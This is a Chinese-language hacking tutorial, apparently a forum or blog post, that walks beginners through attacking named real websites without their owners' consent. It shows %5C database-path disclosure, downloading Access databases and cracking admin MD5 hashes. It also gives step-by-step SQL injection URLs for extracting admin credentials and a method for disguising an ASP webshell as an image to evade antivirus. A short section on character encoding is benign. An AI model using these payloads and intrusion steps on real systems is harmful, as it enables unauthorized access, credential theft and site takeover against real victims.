菜鸟入侵网站实例讲解[精~~~]
本文主要是以实际操作、演练为主!
以供和我一样的菜鸟们学习。
本教程所涉及的有漏洞的网站都是实际检测到的!
而且也未征的网站管理员同意.
同时希望大家不要利用本教程做有损这些网站的事情!
后果自负!。
首先大家请打开IE浏览器
然后点上面的 “工具菜单” 再选择 "IETERNET 选项" 选择 "高级"
把里面的那个 "http错误友好提示" 前的勾给去了(这一步很重要!)
然后在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/index2.asp
在主页上随便选择一个新闻。点击进去~~~这里我们选择 数学组教研信息 http://www.qd65.qdedu.net/teacher/maths/ShowArticle.asp?ArticleID=163
然后我们在地址后面加个小小的斜杠 "/ "
也就是在地址栏里
输入 http://www.qd65.qdedu.net/teacher/maths/ShowArticle.asp?ArticleID=163/
然后 你就会看到这样的提示:
类型不匹配: 'Clng'
/teacher/maths/Inc/syscode.asp
然后我们复制后面的 teacher/maths/Inc/syscode.asp加到http://www.qd65.qdedu.net后面`~~
也就是在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/Inc/syscode.asp
然后大家就会看到这样的提示
'D:\web\teacher\maths\Inc\database\maths.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器
看到没有~~~~数据库真实地址暴露出来了`~~~
http://www.qd65.qdedu.net\teacher\maths\database\maths.asp
就是数据库地址~~~不过数据库的后缀是MDB 这里改为ASP了`~~~在一段时间里~~~这个方法很流行`~~据说可以防止数据库被下载~~~
但是我们把上面的地址复制到迅雷里~~~就可以下载了
下载后~~~我们把文件后缀改为mdb就可以了`~~
然后打开 (当然,前提是你的机器上装了微软办公软件officee中的accsee 数据库软件。如果没有可以去下载个辅臣数据库浏览器,或者直接安装ACCSEE数据库软件)
然后找到一个叫admin 的表`~~~打开~~~前面的那个 是后台管理员的用户名,后面的那个是经过MD5加密后的密码~~~
然后去网上下个MD5 解密器~~~~就可以破解了`~~这样你就是 管理员了; ~~~(有关MD5的知识,军团内有介绍!)
然后去后台 更改文件上传类型~~~~~加一个ASP
然后就上传 ASP木马`~~~手气好的话 就可以拿到 WEBSHELL 了~~~~
好了`~~~就到这里吧~~~~
今天还是以飞扬学院的新闻系统为例,说说这个曾经非常流行的%5C暴库入侵方法。
首先我们打开
飞扬就业网 http://www.feiyangcollege.com/jyw/index.asp
随便点开一个新闻 关于召开毕业典礼的通知
http://www.feiyangcollege.com/jyw/index_Article_Content.asp?fID_ArticleContent=70
然后在后面加一个 ' 于是地址是 http://www.feiyangcollege.com/jyw/index_Article_Content.asp?fID_ArticleContent=70'
提示说我提交非法参数~~~看样子 ' 被程序员屏蔽了 。看样子这样的办法行不通~~~
于是用一下%5c方法~~~
把最后那个/ 改为%5C。也就是http://www.feiyangcollege.com/jyw\index_Article_Content.asp?fID_ArticleContent=70
看看返回的提示是什么~~
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'E:\www.feiyangcollege.com\database.mdb'。
/jyw\index_Article_Content.asp,行15
哈哈 ,数据库暴露了~~~~
于是输入地址 http://www.feiyangcollege.com/database.mdb
晕~~~竟然不存在 此数据库~~~
于是想了下.....................
哦~~~~~~~原来是这样`~~~(原因等下解释)
于是把地址改为http://www.feiyangcollege.com/jyw/database.mdb
哈哈。。。终于搞定~~~~
心想 怎么飞扬学院的人做程序连这点 都考虑不到啊 `~~~把数据库打开,一看表名以及结构`~~
晕~~~竟然 还是那个深度空间 www.deepteach.com 的程序~~~
想不到~~这么有名的程序 也存在这样的漏洞`~~~哈哈`~~~于是去试一下www.deepteach.com 这个网站 ,看看 结果如何。
晕~~~不行~~纳闷中.....................
于是在论坛上http://www.deepteach.com/Forum/dispbbs.asp?boardID=16&ID=290&page=1
再找一个运用了此系统的网站 黑龙江家电维修网http://www.hljjdwx.com/
还是 不行`~~~思考中.............
哦~~~原来 这招只能对付 系统在二级目录下 的程序~~~~
%5c的暴库需要的是二级目录,一级目录无法成功。如:
http://www.feiyang.com%5c1.asp?id=1 不成功
http://www.feiyang.com/other%5c1.asp?id=1 成功
好了,上面所说的只是给大家一个练习的机会~~~~
下面就转几个我收集的这方面的文章,里面有方法和原理。很全面的。(本想自己写的,但是太多了。并且已经有前辈写了,就在这里借用一下)
先转一个非常流行的一篇文章《再谈%5c暴库的利用》
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
关于%5c的暴库利用想已经不是什么新技术了,原因我只找到含糊的说法:\的UNICODE是%5c当提交时,IIS无法正常解析,导致暴库。但我对http://www.hoky.org测试成功后(现在已经补上)问过hoky.pro,得知%5c与IIS的设置是有关系的。而在默认设置下是可以暴库的。
还有很多人说不成功,我要说的三点:
1。一般的错误返回页面是本地IE提供的,所以我们先得关了本地的错误页面,具体在菜单项的‘工具->internet选项->高级->显示友好信息'。
2。对方数据库要是Access型。
3。%5c的暴库需要的是二级目录,一级目录无法成功。如:
http://www.sometips.com%5c1.asp?id=1 不成功
http://www.sometips.com/other%5c1.asp?id=1 成功
好了,上面说的大家都知道,当是废话。在暴库这么好用的东西下,如果一个网站只有一级目录的话,难道就没有办法了吗?
说到重点:
其实一级目录我们也同样可以成功的,我们可以通过构造一个多级目录来达到暴库的目的。
如下:
http://www.target.com/noexists/..%5clist.asp?id=1
这样大家就会有新的惊喜了,呵呵。
补救方法也很简单:
在conn.asp里 加入数据库文件的位置后面加上这句:
On Error Resume Next
就可以了。
SQL注入 是网站入侵中的精华~~~~正因为SQL注入技术 才使得 网站入侵成为 最优美的 黑客攻击 技术~~~
先转个教程 等会 找个网站 给大家演示下
http://www.webjx.com/htmldata/2005-02-26/1109376430.html
http://joyo.i170.cn/Article/16040
先给个网站供大家练习~~
黑龙江家电维修网http://www.hljjdwx.com
这个网站,本人已经检测了。存在SQL漏洞,大家可以试验~~~
我过几天再 写个入侵过程 出来`~~~
大家 交流 一下 入侵经验
...........................................
再看看 浏览器编码方式~~~可以让你 成为SQL注入高手哦~
往往,文本信息的传递实际上通过了一下交换:读者--浏览器--web服务器--数据库服务器;后面的三者不一定都是采用utf-8编码的,特别是当传递汉字的时候。
下面一行可以指定给浏览器文档的编码:
meta http-equiv="Content-Type" content="text/html; charset=utf-8"
浏览器会根据meta值选择编码,它负责读者和浏览器的交互,浏览者可以强制改变编码方式;
同时在asp文件首行可以通过以下命令指定处理字符时候采用的编码:
@ codepage=936 简体中文
@ codepage=950 繁体中文
@ codepage=65001 UTF-8
为了避免乱码产生,最好和数据库以及html信息中指定的编码一致。
在mssql、mysql等数据库中,也含有编码的信息。
ServerXMLHTTP默认的CodePage是UTF8,URL和文件信息被先转换为UTF8编码,如果使用responseText属性,即xmlhttp通过http请求得到的返回的文本信息,如果不采用gb2312编码,即使所有编码一致,汉字也将无法正常显示(测试发现),所以一般使用responseBody,既返回文档的未经过解码的二进制信息,然后在经过编码转换来正确显示汉字。
..................................................
当数据流的源与目的地使用不同的字符编码时,就需要对字符编码进行正确的转换:
1. 处理HTTP请求数据编码
默认情况下,IE浏览器发送请求时采用“ISO-8859-1”字符编码,如果Web应用程序要正确读取用户发送的中文数据,则需要进行编码转换。
一种方法是在处理请求前,先设置HttpServletRequest对象的字符编码:
request.setCharacterEncoding("gb2312");
另一种方法是对用户输入的请求数据进行编码转换:
String clientData = request.getParameter("clientData");
if(clientData != null)
clientData = new String(clientData.getBytes("ISO-8859-1"),"GB2312");
2. 处理数据库数据编码
如果数据库系统的字符编码是“GB2312”,则可以直接读取数据库中的中文数据,无需要转换。如果数据库的字符编码为“ISO-8859-1”,则先对来自数据库的数据进行编码转换,然后才能使用。方法是
new String(field.getBytes("ISO-8859-1"),"GB2312")
这里field为数据库表的某个字段值
=============================================
啊~~~~~~~终于把 那个“黑龙江家电维修网” 搞定了`~~
哈哈`~~还是个比较大的网站呢~~~
这就写个教程出来~~~45157486084
按照上面我给的连接人家给的教程一步一步来~~~
首先进行注入检测:输入http://www.hljjdwx.com
在其主页上随便找个文章
http://www.hljjdwx.com/shownews.asp?NewsID=446
然后改为~~
http://www.hljjdwx.com/shownews.asp?NewsID=446 and 1=2
晕~~竟然提示说“怎么回事老大,中国互联网你也来啊!找日本去!不然我会反攻的哦”
说的也是~~~不过。我可是不搞破坏哦`~~没关系~~~提高中国黑客的技术以及防范意识~~~~
好了废话不说了~~
看样子是空格给屏蔽了。于是把空格用+号代替~~~(这是编码问题,不懂可以查查资料)
还是不行~~~看样子and 也被过滤了`~~于是改为大写~~~AND
哈哈~~
错误 '80020009'
/shownews.asp,行 68
终于出错了`~~看样子能行~~~
好了注入检测就到此为止`~~下面开始进攻~~~
首先猜解数据库的管理员的表名
http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SElECT+COUNT(*)+FROM+ADMIN)>=0
哈哈~~~正常显示~~~看样子表名猜解对了`~~~
于是猜解用户名字段的字段名
(这里,我先看看他的后台登陆处的变量名。是username 我试下。因为大多数程序员为了方便,大多将数据库的字段名与这个变量名设置成一样的。这样虽然易于设计程序`~但是对于黑客可是很大的方便哦)
http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+COUNT(username)+FROM+ADMIN)>=0
哈哈`~~~成功`~~!!!
于是再猜测 字段~~
先猜测长度~~~
http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+top+1+len(username)+FROM+ADMIN)>=0
http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+top+1+len(username)+FROM+ADMIN)>=1
一个一个试~~~当然能才出来~~
但是我还没那么苯拉 于是用折中法
猜解出来为3~~~
再猜解单个单个字段直:
方法与上面一样~~~我猜解出来的3个为负的四位数~~~
这个花了我好多时间啊`~~
大家都知道因为ASCII码的直为1-125~~
但是这个负数是怎么回事情呢?
经过高人指点~~~原来是汉字`~~~于是把数字用
msgbox Chr(数字)
方法解码~~~
晕~~原来第一个是个 “风”字~~
再看看 他的前台新闻中`~~有个叫 “风雷电”的家伙发了不少文章
看样子 后面那两个字不用 猜解了`~~~
于是用相同方法猜解密码~~~~
哈哈`~~是11位的密码`~~~
把得到的数据~~~对照ASCII 再编码过来`~~
哈哈~~~是11个大写字母~~~
看样子没经过MD5加密(因为MD5加密后为16或者32位数据)
狂喜`~~
于是输入用户名 密码`~~~
晕~~~没用`~~
是不是密码猜解错误~~~~???
于是再猜解一次~~~~
没错啊`~~
想了N久~~~
哦~~~
原来不应该用ASCII解码~~~~
用上面的
msgbox Chr(数字)
方法~~~
哈哈`~~得到11位的数字~~~
于是............
终于进到后台了~~~
今天Fire Phoenix 说他 弄了一个网站的后台~~~~
于是我跟他要来后台密码~~~于是 更改上传类型~ 加了个ASP进去~~~
于是找到上传页面 上传了一个 站长助手~~~~但是我上传了好几次,竟然无法访问~~~于是上传再刷新一下 竟然文件不见了`~~
........于是我纳闷了N久~~~哦。。原来是 站长助手被服务器上的杀毒软件杀了。于是我想到用图片木马~~
由于我这人不太喜欢用工具,所以就没用网上的免杀ASP工具,于是~~~自已手动做免杀
工具:站长助手(这个当然需要拉~~代码那么长自己做不来啊) 2.asp
新建一个asp文件 内容是: 名为:1.asp
再建一个jpg或gif图片格式的文件 3.jpg
进DOS合并文件,如文件都有在C盘下 执行 copy /b 2.asp+1.jpg pig.jpg
生成pig.jpg文件
最后把1.asp和pig.jpg两个文件上传到肉鸡。
浙公网安备 33010602011771号